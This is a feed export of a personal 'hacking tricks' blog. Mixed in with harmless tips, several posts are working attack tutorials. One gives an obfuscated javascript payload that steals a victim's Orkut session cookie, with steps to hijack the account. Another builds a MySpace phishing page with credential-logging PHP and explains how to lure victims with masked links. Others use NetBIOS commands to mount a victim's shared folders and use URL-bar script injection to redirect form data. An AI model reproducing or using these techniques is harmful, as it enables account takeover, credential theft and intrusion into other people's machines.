Tisch Way, Lobby Level    San Jose, California 95128    US    Domain Name: NETCOM.COM    Administrative Contact:       NETCOM Network Management  (NETCOM-NM)  dns-mgr@NETCOM.COM       (408) 983-5970    Technical Contact, Zone Contact:       NETCOM DNS Administration  (NETCOM-DNS)  dns-tech@NETCOM.COM       (408) 983-5970    Record last updated on 03-Jan-97.    Record created on 01-Feb-91.    Domain servers in listed order:    NETCOMSV.NETCOM.COM          192.100.81.101    NS.NETCOM.COM                192.100.81.105    AS3.NETCOM.COM               199.183.9.4 &lt;/span&gt;&lt;/pre&gt; &lt;p&gt;Here, the snooping party has discovered that the provider is in the state of  California !&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description><link>http://kwtb.blogspot.com/2010/09/finding-identity-online.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-2505711169297666542</guid><pubDate>Fri, 17 Sep 2010 05:27:00 +0000</pubDate><atom:updated>2010-09-17T11:10:49.001+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">algorithm</category><category domain="http://www.blogger.com/atom/ns#">encryption</category><title>A Simple Encryption Algorithm!</title><description>&lt;div&gt;int Encrypt(char a)&lt;/div&gt;&lt;div&gt;{&lt;/div&gt;&lt;div&gt;  if (a == &#39; &#39;)&lt;/div&gt;&lt;div&gt;    return 95;&lt;/div&gt;&lt;div&gt;  else if (a == &#39;\n&#39;)&lt;/div&gt;&lt;div&gt;    return 96;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;  for (int x = 0; a != x; x++)&lt;/div&gt;&lt;div&gt;    {&lt;/div&gt;&lt;div&gt;      if (a-33 == x)&lt;/div&gt;&lt;div&gt;        return x;&lt;/div&gt;&lt;div&gt;    }&lt;/div&gt;&lt;div&gt;  return 0;&lt;/div&gt;&lt;div&gt;}&lt;/div&gt;</description><link>http://kwtb.blogspot.com/2010/09/simple-encryption-algorithm.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-2113365234085507876</guid><pubDate>Sat, 13 Jun 2009 18:10:00 +0000</pubDate><atom:updated>2009-06-13T23:55:08.912+05:30</atom:updated><title>Proxy Servers!</title><description>Hackers are everywhere portscanning IP addresses for security holes! Finding a security hole in your IP makes you vulnerable to many kinds of attack! One of the ways of defending yourself from these kind of hackers is by using Proxy Servers.&lt;br /&gt;&lt;br /&gt;WHAT IS A PROXY SERVER?&lt;br /&gt;Its a software that hides your IP address and thereby prevent unauthorized access to your computer through the Internet. They do not provide anyone with your IP address and effectively hide any information about you and your reading interests. Besides that, they don’t even let anyone know that you are surfing through a &lt;i&gt;proxy server&lt;/i&gt;. Anonymous proxy servers can be used for all kinds of Web-services, such as Web-Mail (MSN Hot Mail, Yahoo mail), web-chat rooms, FTP archives, etc.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;HOW TO SETUP A PROXY SERVERS?&lt;br /&gt;Go to control panel&lt;br /&gt;1)Phone and modem options&lt;br /&gt;2)In that select Advanced tab&lt;br /&gt;3)In Providers list, click Microsoft H.323 Telephony Service Provider, and then click Configure.&lt;br /&gt;4)In Configure check H.323 Service Provider&lt;br /&gt;5)To specify an H.323 proxy, select the Use H.323 proxy, and then type the server   name or IP address for the proxy.&lt;br /&gt;&lt;br /&gt;Do not know how to configure it? Then try out the proxy software from http://www.proxy4free.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Source: http://www.proxy4free.com/</description><link>http://kwtb.blogspot.com/2009/06/proxy-servers.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-2771856829270299292</guid><pubDate>Fri, 14 Nov 2008 10:03:00 +0000</pubDate><atom:updated>2008-11-14T15:33:29.449+05:30</atom:updated><title>Change Windows Admin password</title><description>&lt;h3 class=&quot;smller&quot;&gt;&lt;br /&gt;&lt;/h3&gt; &lt;div class=&quot;para&quot;&gt; 1.go to Run-&gt; type &#39;lusrmgr.msc&#39; without quotes&lt;br /&gt;2.there u will see admin or administrator.&lt;br /&gt;3.right click on it and select set password.&lt;br /&gt;4.type the desired password twice and you are done!This will not even for old password! &lt;/div&gt;</description><link>http://kwtb.blogspot.com/2008/11/change-windows-admin-password.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-6208973393115473783</guid><pubDate>Fri, 14 Nov 2008 09:55:00 +0000</pubDate><atom:updated>2008-11-14T15:26:36.067+05:30</atom:updated><title>Trick to change your ip address to new ip address</title><description>&lt;h3 class=&quot;post-title entry-title&quot;&gt; &lt;a href=&quot;http://trickway.blogspot.com/2008/08/trick-to-change-your-ip-to-new-one.html&quot;&gt;&lt;br /&gt;&lt;/a&gt; &lt;/h3&gt;   you can surf anonymously after changing the&lt;a href=&quot;http://whatismyipaddress.com/&quot;&gt; ip address&lt;/a&gt; so that the risk of getting hacked is less.Steps involved in changing the ip address.&lt;br /&gt;1.Click &lt;span style=&quot;color: rgb(51, 255, 51);&quot;&gt; run&lt;/span&gt;&lt;br /&gt;2.Type &quot;&lt;span style=&quot;color: rgb(51, 255, 51);&quot;&gt;cmd&lt;/span&gt;&quot; and press &quot;enter&quot;&lt;br /&gt;3.type &quot;&lt;span style=&quot;color: rgb(51, 255, 51);&quot;&gt;ipconfig/release&lt;/span&gt;&quot; and press &quot;enter&quot;&lt;br /&gt;4.Type &quot;&lt;span style=&quot;color: rgb(51, 255, 51);&quot;&gt;exit&lt;/span&gt;&quot; and press &quot;enter&quot;&lt;br /&gt;5. click &quot;&lt;span style=&quot;color: rgb(51, 255, 51);&quot;&gt;Network connections&lt;/span&gt;&quot; in your control panel &lt;span style=&quot;color: rgb(51, 255, 51);&quot;&gt;&lt;/span&gt;&lt;br /&gt;6.select &lt;span style=&quot;color: rgb(51, 255, 51);&quot;&gt;local area connection&lt;/span&gt; and click &lt;span style=&quot;color: rgb(51, 255, 51);&quot;&gt;properties&lt;/span&gt;&lt;br /&gt;7.Double click &quot;&lt;span style=&quot;color: rgb(51, 255, 51);&quot;&gt;TCP/IP&lt;/span&gt;&quot; under &quot;&lt;span style=&quot;color: rgb(51, 255, 51);&quot;&gt;general tab&lt;/span&gt;&quot;.&lt;br /&gt;8.select &quot;&lt;span style=&quot;color: rgb(51, 255, 51);&quot;&gt;Use the following ip address&lt;/span&gt;&quot;&lt;br /&gt;9.Type any numbers until the area get filled.&lt;br /&gt;10.Click &quot;&lt;span style=&quot;color: rgb(51, 255, 51);&quot;&gt;TAB&lt;/span&gt;&quot; so that it will automatically fill the Subnet Mask&lt;br /&gt;11.click ok&lt;br /&gt;12.again click ok&lt;br /&gt;13.Repeat steps 6 and 7&lt;br /&gt;14.select &quot;&lt;span style=&quot;color: rgb(51, 255, 51);&quot;&gt;obtain ip address automatically&lt;/span&gt;&quot;&lt;br /&gt;15.click ok&lt;br /&gt;16.Now YOu have a new ip address&lt;br /&gt;17.Enjoy safe surfing with a new ip address</description><link>http://kwtb.blogspot.com/2008/11/trick-to-change-your-ip-address-to-new.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-7931736517792142204</guid><pubDate>Mon, 03 Nov 2008 09:46:00 +0000</pubDate><atom:updated>2008-11-03T15:23:02.809+05:30</atom:updated><title>Hacking Orkut Accounts through cookie stealing..</title><description>Procedure to hack gmail or orkut through mozilla by stealing cookies:-&lt;br /&gt;1.Firstly you need have Mozilla firefox.&lt;br /&gt;&lt;br /&gt;2.Download cookie editor plugin for Mozilla firefox from:&lt;br /&gt;&lt;a href=&quot;https://addons.mozilla.org/en-US/firefox/addon/573&quot;&gt;https://addons.mozilla.org/en-US/firefox/addon/573&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;3.You need to have two fake accounts to Hack Orkut or Gmail , So that you have to receive cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts.&lt;br /&gt;&lt;br /&gt;Cookie Script:&lt;br /&gt;javascript:nobody=replyForm;nobody.toUserId.value=33444211;nobody.scrapText.value=document.cookie;nobody.action=&#39;scrapbook.aspx?Action.submit&#39;;nobody.submit()&lt;br /&gt;How to use cookies script?&lt;br /&gt;1. Replace your number &quot;UserId.value=33444211&quot;&lt;br /&gt;How to Replace your Number&lt;br /&gt;1.Go to your album&lt;br /&gt;2. Right click on any Photo&gt; Properties&gt;55886645.jpg It will be a Eight Digit Value.&lt;br /&gt;3. Now replace your value with the value in the java script.&lt;br /&gt;Your script will look like.&lt;br /&gt;&lt;br /&gt;javascript:nobody=replyForm;nobody.toUserId.value=yournumber;nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));nobody.action=&#39;Scrapbook.aspx?Action.writeScrapBasic&#39;;nobody.submit()&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.Now send this Cookie script to the victim and ask him to paste in Address bar and Press enter&lt;br /&gt;&lt;br /&gt;3.You&#39;ll Get his cookie in your scrap book.&lt;br /&gt;&lt;br /&gt;4.After Getting a cookie go to your orkut Home page , Then click on Tools tab and then go to cookie editor plugin( Tools--&gt; Cookie editor)5.click filter/refresh.look for &#39;orkut_state&#39; cookie. just double click it and replace the orkut_state part with your victim&#39;s Scriptput ur eight digit number in the place of (33444211).&lt;br /&gt;Thats it your done with.&lt;br /&gt;Logout of your orkut and login again and you&#39;ll be in your victims Homepage.</description><link>http://kwtb.blogspot.com/2008/11/hacking-orkut-accounts-through-cookie.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>297</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-5767337348734418959</guid><pubDate>Mon, 03 Nov 2008 09:33:00 +0000</pubDate><atom:updated>2008-11-03T15:16:05.113+05:30</atom:updated><title>Hacking Accounts through phishing......</title><description>1. Intro&lt;br /&gt;There are couple of other phishing tutorials around here, but some people seem to have problems understanding them. So I&#39;ll try to be as simple as possible. This tutorial is written for newbs, and if you have problems understanding it, then you need to get some beginner level computer knowledge first.&lt;br /&gt;&lt;br /&gt;2. What is a phisher?&lt;br /&gt;Phisher is something that looks like a login page(a fake login page), that writes the username and the password to a file, or does whatever you want.&lt;br /&gt;&lt;br /&gt;3. How to make one?&lt;br /&gt;All you need is a web hosting service with PHP enabled.We will use t35. Go to http://www.t35.com and sign up for a free account. In this tutorial we will make a phishing site for Myspace(the procedure is equivalent for most of the sites). While not signed in myspace, open anyone&#39;s profile and click on his picture. That will lead you to Myspace&#39;s login page that has the red box with&quot;You Must Be Logged-In to do That!&quot; just above your login form. Now, click File&gt;Save Page As, and save the myspace page to your Desktop. Open your saved page with any text editor(notepad, wordpad etc.). Select all of the text(the source code),and copy it.&lt;br /&gt;Get back to your t35 account and click on &#39;New File&#39; and paste the Myspace&#39;s source code there. Name the file &#39;login.php&#39;(without the &#39;&#39;), and save it.Now you have made a page equal to Myspace. Everything on that page will have the same function as if it were on the original site. The link to your phish site will be &#39;www.xxx.t35.com/login.php&#39; - where &#39;xxx&#39; is the name of your account.But there is a little problem. When someone enters his username and password and press login, it logs him into the real myspace.&lt;br /&gt;What do we need to change?&lt;br /&gt;What we need to change is the action of the &#39;login&#39; button, so instead of logging them into the real site, it writes the username and password to a text file.&lt;br /&gt;Open your &#39;login.php&#39; file. Search in the code for keywords &#39;action=&#39;.There will be several &#39;action=some link&#39; in the myspace&#39;s source code(for the sign in button, search button, etc.). We need to find the &#39;action=some link&#39; that refers to the Login button.&lt;br /&gt;After some searching, we find the:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;h5 class=&quot;heading&quot;&lt;br /&gt;Member Login&lt;br /&gt;form action=&quot;http://secure.myspace.com/index.cfm?fuseaction=login.process&quot; method=&quot;post&quot; id=&quot;LoginForm&quot; name=&quot;aspnetForm&quot;&lt;br /&gt;&lt;br /&gt;and we know that &#39;action=&quot;http://secure.myspace.com/index.cfm?fuseaction=login.process&quot;&#39; refers to the login button.&lt;br /&gt;Change:&lt;br /&gt;action=&quot;&lt;a href=&quot;http://%20secure.myspace.com/index.cfm?fuseaction=login.process&quot;&gt;http:// secure.myspace.com/index.cfm?fuseaction=login.process&lt;/a&gt;&quot;&lt;br /&gt;To:&lt;br /&gt;action=&quot;phish.php&quot;and save the file.&lt;br /&gt;Formerly, when you click the login button it would take the values in the username and password boxes, and execute the functions in the &#39;&lt;br /&gt;http://secure.myspace.com/index.cfm?fuseaction=login.process&#39;  file.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now when you click the login button it will take the values in the username in password boxes, and execute the functions in the &#39;phish.php&#39; file on your site(which doesn&#39;t exist yet).All we have to do now, is to create a &#39;phish.php&#39; file that contains a function that writes down the username and password into a text document.&lt;br /&gt;Make another file named &#39;phish.php&#39;(without the quotes) and paste the following code in it:&lt;br /&gt;$value) {&lt;br /&gt;fwrite($handle, $variable);&lt;br /&gt;fwrite($handle, &quot;=&quot;);&lt;br /&gt;fwrite($handle, $value);&lt;br /&gt;fwrite($handle, &quot;\r\n&quot;);}&lt;br /&gt;fwrite($handle, &quot;\r\n&quot;);&lt;br /&gt;fclose($handle);&lt;br /&gt;exit;&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;The function of phish.php is simple. It opens a file named &#39;passwords.txt&#39;(and creates it if it doesn&#39;t already exist) and enter the informations there(the username and password).Congratulations! You have a phisher!!!&lt;br /&gt;&lt;br /&gt;The link to your phish site is: http://xxx.t35.com/login.php -where &#39;xxx&#39; is your account name.The link to your text file is: http://xxx.t35.com/passwords.txtOr you may access it from your account.&lt;br /&gt;Note that you can choose whatever names you like for login.php, phish.php and passwords.txt. but the .php and .txt must stay the same.&lt;br /&gt;&lt;br /&gt;4. How to trick people to fall for it.&lt;br /&gt;There are billions of ways how to do it, your creativity is your limit.Most common way is to make an email similar to the admin, and sending them some report with a link to log in the site(your phish site). Ofcourse you will mask the link.&lt;br /&gt;How to mask the link?&lt;br /&gt;Code:&lt;br /&gt;[url=YourPhishSiteLink]TheOriginalSiteLink[/url]&lt;br /&gt;&lt;br /&gt;For example, www.google.com looks like a google, but it leads you to yahoo when you click it.If you&#39;re making the phisher for myspace, and want to get random ppl to it, you can simply make some hot chick account and put some hot pic that will lead to your phish site when clicked. So when they click the lusty image, they will be led to your phish site telling them they need to log in to see that.HeheLike this:&lt;br /&gt;Code:&lt;br /&gt;[url=YourPhishSiteLink][img]link of the image[/img][/url]</description><link>http://kwtb.blogspot.com/2008/11/hacking-accounts-through-phishing.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-2023613309387359205</guid><pubDate>Sun, 19 Oct 2008 04:28:00 +0000</pubDate><atom:updated>2008-10-19T10:00:50.299+05:30</atom:updated><title>Multiple Logins of Gmail and Orkut through firefox</title><description>Just follow the following steps and you will be able to login in gmail and orkut with multiple accounts. Through this you will be able to make profiles in your firefox.&lt;br /&gt;Step 1:Open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this information to each textbox.&lt;br /&gt;&lt;br /&gt;Step 2:variable name: moz_no_remote (should be all small letter).variable value: 1&lt;br /&gt;&lt;br /&gt;Step 3:open firefox icon&#39;s properties(from desktop and quick launch). add extension -p to command line(like &quot;c:\program files\mozilla firefox\firefox.exe&quot; -p). press ok.&lt;br /&gt;&lt;br /&gt;When you will open firefox it will prompt for profile selection create a profile,open firefox login to orkut open once more use another profile login.</description><link>http://kwtb.blogspot.com/2008/10/multiple-logins-of-gmail-and-orkut.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-6628767055038406735</guid><pubDate>Mon, 13 Oct 2008 08:33:00 +0000</pubDate><atom:updated>2008-10-13T14:12:40.100+05:30</atom:updated><title>Introduction  to MMORPGs</title><description>MMORPG is short for Massively Multiplayer Online Role-Playing Game. MMORPGs are client-&lt;br /&gt;server model games in which players, running the client software, are engaged in the game&lt;br /&gt;world through a player-customized character  an avatar. The game provider or publisher hosts&lt;br /&gt;through a server the persistent, or virtual, world that these players inhabit. A world-wide stream of players constantly interacting with this ever-changing virtual world, always available for play, mark the principle characteristic of the Massively Multiplayer Online Role-Playing Game.</description><link>http://kwtb.blogspot.com/2008/10/introduction-to-mmorpgs.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-5601830303305959749</guid><pubDate>Tue, 22 Jul 2008 06:56:00 +0000</pubDate><atom:updated>2008-07-22T12:27:58.048+05:30</atom:updated><title>Security Breaching..</title><description>&lt;div class=&quot;para&quot;&gt; If your victim posess certain security flaws then her system can be broken into in less that 15 seconds.&lt;br /&gt;&lt;br /&gt;This is how : -&lt;br /&gt;Click &quot;Start -&gt; Run -&gt; cmd&quot;&lt;br /&gt;&lt;br /&gt;Type the following at the Dos Prompt&lt;br /&gt;Nbtstat –A IP address [e.g: nbtstat –A 207.175.1.1]&lt;br /&gt;&lt;br /&gt;This will give you a read out that looks like this&lt;br /&gt;NetBIOS Remote Machine Name Table&lt;br /&gt;____________________________________&lt;br /&gt;Name Type Status&lt;br /&gt;------------------------------------&lt;br /&gt;abhi &lt;00&gt; UNIQUE Registered&lt;br /&gt;WORK &lt;00&gt; GROUP Registered&lt;br /&gt;abhi &lt;03&gt; UNIQUE Registered&lt;br /&gt;abhi &lt;20&gt; UNIQUE Registered&lt;br /&gt;WORK &lt;1e&gt; GROUP Registered&lt;br /&gt;WORK &lt;1d&gt; UNIQUE Registered&lt;br /&gt;__MSBROWSE__.&lt;01&gt;GROUP Registered&lt;br /&gt;____________________________________&lt;br /&gt;&lt;br /&gt;The numbers in the &lt;&gt; are hex code values. What we are&lt;br /&gt;interested in is the “Hex Code” number of &lt;20&gt;.&lt;br /&gt;A hex code of &lt;20&gt; means you have file and printer sharing turned on.&lt;br /&gt;&lt;br /&gt;Next step is to find out what is being shared. This is how : -&lt;br /&gt;&lt;br /&gt;Net view \\&lt;br /&gt;[e.g : net view \\207.175.1.1]&lt;br /&gt;&lt;br /&gt;You will then get a response that looks something like this.&lt;br /&gt;Shared resources at \\ip_address&lt;br /&gt;Sharename Type Comment&lt;br /&gt;______________________&lt;br /&gt;MY DOCUMENTS Disk&lt;br /&gt;TEMP Disk&lt;br /&gt;______________________&lt;br /&gt;(The command was completed successfully.)&lt;br /&gt;&lt;br /&gt;This shows you that your potential victim has their My&lt;br /&gt;Documents Folder shared and their Temp directory shared. For&lt;br /&gt;you to then get access to those folders next command will be.&lt;br /&gt;&lt;br /&gt;Net use x: \\\temp&lt;br /&gt;[e.g : net use x: \\207.175.1.1\temp]&lt;br /&gt;&lt;br /&gt;If all goes well for you, you will then get a response of&lt;br /&gt;(The command was completed successfully.)&lt;br /&gt;Open my computer you will see your victim&#39;s temp folder there&lt;br /&gt;&lt;br /&gt;for more info visit&lt;br /&gt;&lt;a href=&quot;http://windowsstart.blogspot.com/2008/06/hackig-in-15-seconds.html&quot; target=&quot;_blank&quot;&gt;http://windowsstart.blogspot.com/2008/0&lt;wbr&gt;6/hackig-in-15-seconds.html&lt;/a&gt; &lt;/div&gt;</description><link>http://kwtb.blogspot.com/2008/07/security-breaching.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-22233045461266141</guid><pubDate>Sun, 06 Jul 2008 10:37:00 +0000</pubDate><atom:updated>2008-07-06T16:10:32.486+05:30</atom:updated><title>Javascript injection technique</title><description>This tutorial is going to teach you the basics of Javascript Injections. They are fairly simple if you know Javscript already. This is in a way a type of hacking. You can do many many things with this, such as, alter form values, alter cookies, set cookies, gain access to restricted pages, and as I said, much much more.&lt;br /&gt;&lt;br /&gt;Hello World! is the easiest thing you can do. It doesn&#39;t effect a page, but it deffinatly gets you an understanding of how this is going to work. First of all, all Javascript Injections are preformed in the URL Bar (Address Bar). So go to any website you want, It doesn&#39;t really matter at all. Then, type in the URL Bar:&lt;br /&gt;&lt;br /&gt;&lt;pre class=&quot;alt2&quot; dir=&quot;ltr&quot; style=&quot;border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 34px; text-align: left;&quot;&gt;javascript:alert(&#39;Hello World!&#39;);&lt;/pre&gt;&lt;br /&gt;Now, let me explain what this does&lt;br /&gt;&lt;br /&gt;&lt;b&gt;javascript&lt;/b&gt;: This lets the browser you are using know that you are about to enter some sort of a Javascript command.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;alert&lt;/b&gt;: This will make a little box pop up with the infor you wished to see. In our case. &quot;Hello World&quot;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;(&#39;Hello World!&#39;)&lt;/b&gt;: This will be what is displayed in out alert box. Don&#39;t forget the quotes, otherwise it won&#39;t work properly.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;;&lt;/b&gt;: As with almost every single Scripting/Programming language, you need to remember this at the end of almost every line of code. It won&#39;t work right without it.&lt;br /&gt;&lt;br /&gt;If you did all that right, after you hit the enter button, you would have gotten a pop-up box displaying &quot;Hello World&quot;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Working With Cookies&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;This, can be a tiny bit more difficult to understand at first. And it still is for me, because I am sucky when it comes to Javascript. So I won&#39;t be the best at explaining every bit of this. But if you follow right, you should get it. Now, as before, go to any website you wish. For this tutorial, I will be using Tizag.com. Clear your address bar, and type:&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;margin: 5px 20px 20px;&quot;&gt; 	&lt;div class=&quot;smallfont&quot; style=&quot;margin-bottom: 2px;&quot;&gt;Code:&lt;/div&gt; 	&lt;pre class=&quot;alt2&quot; dir=&quot;ltr&quot; style=&quot;border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 34px; text-align: left;&quot;&gt;javascript:alert(document.cookie);&lt;/pre&gt; &lt;/div&gt;If you did that right, depending on the website, you should get a bunch of jumbled leters and things, or something along those lines. This can very quite a bit from website to website. Lets break this up though and go over what everything does. (I&#39;m only going to go over the new bits, if you forgot what the first bits were, go back up and read about it.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;(document.cookie)&lt;/b&gt; This will display the cookies that that website has set. Notice that there aren&#39;t any quotes around it? If there were, it would just display &quot;document.cookie&quot; in your little pop-up box, because it reads it as plain text.&lt;br /&gt;&lt;br /&gt;Now lets add some cookies to a page. On that same webpage, view the cookies, using the previous method, and remember what they are, because we are going to add to that. Here is the script:&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;margin: 5px 20px 20px;&quot;&gt; 	&lt;div class=&quot;smallfont&quot; style=&quot;margin-bottom: 2px;&quot;&gt;Code:&lt;/div&gt; 	&lt;pre class=&quot;alt2&quot; dir=&quot;ltr&quot; style=&quot;border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 34px; text-align: left;&quot;&gt;javascript:void(document.cookie = &quot;Access = Granted&quot;);&lt;/pre&gt; &lt;/div&gt;Nothing will happen; or so it seems. After you hit enter again, clear that, and view the cookies again. If you did it right, you will see either at the begginning or the end of the cookie contents, &quot;Access=Granted&quot;. This is one of those ways you can get past like, say, a forum ban. They just set it so that you couldn&#39;t get in anymore. Now, I&#39;m not saying it will work, because, it probly won&#39;t, becuase most forum software&#39;s are way more secure that that, using PHP IP Blocks and such. But I&#39;m not going to bother going over that. Now, lets go over what we just did.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;void&lt;/b&gt;: This is just one of those things I am not to clear about. I would say what I think it is, but I don&#39;t want to make a fool of myself.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;(document.cookie = &quot;Access = Granted&quot;)&lt;/b&gt;: This gets into the cookies, and then adds the cookie saying that Access is granted. (Just an example, you could use anything.)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Alter Forms&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Sometimes, to edit values sent to a given website through a form, you can download the html and edit it slightly to allow you to submit what you want. However, sometimes the website checks to see if you actually submitted it from the website you were supposed to. To get around this, we can just edit the form straight from javascript. Note: The changes are only temporary, so it&#39;s no tuse trying to deface a site through javascript injection like this.&lt;br /&gt;&lt;br /&gt;Every form on a given webpage (unless named otherwise) is stored in the forms[x] array... where &quot;x&quot; is the number, in order from top to bottom, of all the forms in a page. Note that the forms start at 0, so the first form on the page would actually be 0, and the second would be 1 and so on. Here is a sample form which we will alter:&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;margin: 5px 20px 20px;&quot;&gt; 	&lt;div class=&quot;smallfont&quot; style=&quot;margin-bottom: 2px;&quot;&gt;Code:&lt;/div&gt; 	&lt;pre class=&quot;alt2&quot; dir=&quot;ltr&quot; style=&quot;border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 50px; text-align: left;&quot;&gt;&lt;form action=&quot;http://www.website.com/submit.php&quot; method=&quot;post&quot;&gt;&lt;br /&gt;&lt;input name=&quot;to&quot; value=&quot;admin@website.com&quot; type=&quot;hidden&quot;&gt;&lt;/form&gt; &lt;/pre&gt;And now, here is the Javascript Injection we will use to alter the values of the form.&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;margin: 5px 20px 20px;&quot;&gt; 	&lt;div class=&quot;smallfont&quot; style=&quot;margin-bottom: 2px;&quot;&gt;Code:&lt;/div&gt; 	&lt;pre class=&quot;alt2&quot; dir=&quot;ltr&quot; style=&quot;border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 34px; text-align: left;&quot;&gt;javascript:alert(document.forms[0].to.value)&lt;/pre&gt; &lt;/div&gt;Now, without having to read the source code and find out all the form information, just do that, and it will display the first forms information on the page you are trying to tweak.&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;margin: 5px 20px 20px;&quot;&gt; 	&lt;div class=&quot;smallfont&quot; style=&quot;margin-bottom: 2px;&quot;&gt;Code:&lt;/div&gt; 	&lt;pre class=&quot;alt2&quot; dir=&quot;ltr&quot; style=&quot;border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 34px; text-align: left;&quot;&gt;javascript:void(document.forms[0].to.value=&quot;email@nhacks.com&quot;)&lt;/pre&gt; &lt;/div&gt;Now that you have the information stored in the forms, you need to change it to your likings. In our case, we changed the e-mail to something that suited us. Because, lets pretend that for some reason, this form was sending vital information about a major website. Now it will send it all to the e-mail we just put in.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://kwtb.blogspot.com/2008/07/javascript-injection-technique.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-6053866915005769403</guid><pubDate>Thu, 03 Jul 2008 15:02:00 +0000</pubDate><atom:updated>2008-07-03T20:37:01.368+05:30</atom:updated><title>Password Hacking methods often used..</title><description>&lt;span style=&quot;font-family:georgia;&quot;&gt;Password cracking is the process of recovering              secret passwords from data that has been stored in or transmitted              by a computer system. A common approach is to repeatedly try guesses              for the password.&lt;br /&gt;            Most passwords can be cracked by using following techniques :&lt;br /&gt;&lt;br /&gt;            &lt;span style=&quot;font-size:130%;color:#0033ff;&quot;&gt;1) Hashing :-&lt;/span&gt;              Here we will refer to the one way function (which may be either an              encryption function or cryptographic hash) employed as a hash and              its output as a hashed password.&lt;br /&gt;            If a system uses a reversible function to obscure stored passwords,              exploiting that weakness can recover even &#39;well-chosen&#39; passwords.             &lt;br /&gt;            One example is the LM hash that Microsoft Windows uses by default              to store user passwords that are less than 15 characters in length.             &lt;br /&gt;            LM hash breaks the password into two 7-character fields which are              then hashed separately, allowing each half to be attacked separately.&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family:georgia;&quot;&gt;&lt;i&gt;***Hash functions like SHA-512,              SHA-1, and MD5 are considered impossible to invert when used correctly&lt;br /&gt;&lt;br /&gt;&lt;/i&gt;&lt;/span&gt;&lt;span style=&quot;font-family:georgia;&quot;&gt;&lt;span style=&quot;font-size:130%;color:#0033ff;&quot;&gt;2) Guessing :-&lt;/span&gt; Many passwords              can be guessed either by humans or by sophisticated cracking programs              armed with dictionaries (dictionary based) and the user&#39;s personal              information.              &lt;/span&gt;&lt;p&gt;&lt;span style=&quot;font-family:georgia;&quot;&gt;Not surprisingly, many users choose weak passwords, usually one                related to themselves in some way. Repeated research over some 40                years has demonstrated that around 40% of user-chosen passwords                are readily guessable by programs. Examples of insecure choices                include:&lt;/span&gt;&lt;/p&gt; &lt;span style=&quot;font-family:georgia;&quot;&gt;            &lt;/span&gt;&lt;p&gt;&lt;span style=&quot;font-family:georgia;&quot;&gt;* blank (none)&lt;br /&gt;              * the word &quot;password&quot;, &quot;passcode&quot;, &quot;admin&quot;                and their derivatives&lt;br /&gt;              * the user&#39;s name or login name&lt;br /&gt;              * the name of their significant other or another person (loved one)&lt;br /&gt;              * their birthplace or date of birth&lt;br /&gt;              * a pet&#39;s name&lt;br /&gt;              * a dictionary word in any language&lt;br /&gt;              * automobile licence plate number&lt;br /&gt;              * a row of letters from a standard keyboard layout (eg, the qwerty                keyboard -- qwerty itself, asdf, or qwertyuiop)&lt;br 